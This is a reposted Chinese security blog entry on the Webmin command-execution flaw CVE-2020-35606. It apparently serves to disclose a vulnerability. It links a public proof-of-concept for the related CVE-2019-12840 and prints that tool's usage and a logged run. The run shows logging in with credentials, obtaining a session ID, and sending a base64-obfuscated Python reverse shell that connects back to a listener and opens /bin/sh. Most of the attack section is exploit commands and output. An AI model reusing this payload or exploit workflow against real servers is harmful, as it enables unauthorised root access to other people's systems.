CVE-2020-35606 Webmin命令执行

admin 2022年5月23日10:55:20评论90 views字数 1276阅读4分15秒阅读模式


漏洞详情:


        Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。


此漏洞绕过了针对CVE-2019-12840采取的措施,并将其转换为新的载体。


CVE-2019-12840-POC:


https://github.com/KrE80r/webmin_cve-2019-12840_poc


$ python3 CVE-2019-12840.py  -u https://192.168.122.10 -U matt -P Secret123 -lhost 192.168.122.1 -lport 443
_______ ________ ___ ___ __ ___ __ ___ ___ _ _ ___ / ____ / / ____| |__ / _ /_ |/ _ /_ |__ / _ | || | / _ | | / /| |__ ______ ) | | | || | (_) |______| | ) | (_) | || |_| | | || | / / | __|______/ /| | | || |__, |______| | / / > _ <|__ _| | | || |____ / | |____ / /_| |_| || | / / | |/ /_| (_) | | | | |_| | _____| / |______| |____|___/ |_| /_/ |_|____|___/ |_| ___/ by KrE80r
Webmin <= 1.910 RCE (Authorization Required)
usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -c "id"usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -lhost <LOCAL_IP> -lport 443

[*] logging in ...
[+] got sid cd97c25b388e8ecd36f15571b223a8bf
[*] sending command python -c "import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMTIyLjEiLDQ0MykpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='))"


本文始发于微信公众号(Khan安全攻防实验室):CVE-2020-35606 Webmin命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月23日10:55:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-35606 Webmin命令执行http://cn-sec.com/archives/535234.html

发表评论

匿名网友 填写信息